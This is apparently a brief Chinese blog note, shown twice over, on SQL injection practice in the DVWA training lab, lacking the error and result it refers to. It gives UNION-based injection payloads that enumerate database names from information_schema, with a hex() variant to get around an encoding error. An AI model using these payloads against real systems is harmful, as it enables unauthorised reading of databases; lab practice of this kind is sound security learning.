直接改这个就可以解决
dvwa SQL注入时为了获取数据库名输入
1' union select 1,schema_name from information_schema.schemata #
但出现了如下问题
经查应该是编码的问题,采用hex转16进制可解决
1' union select 1,hex(schema_name) from information_schema.schemata #
最后经hex解码可得:
直接改这个就可以解决
dvwa SQL注入时为了获取数据库名输入
1' union select 1,schema_name from information_schema.schemata #
但出现了如下问题
经查应该是编码的问题,采用hex转16进制可解决
1' union select 1,hex(schema_name) from information_schema.schemata #
最后经hex解码可得: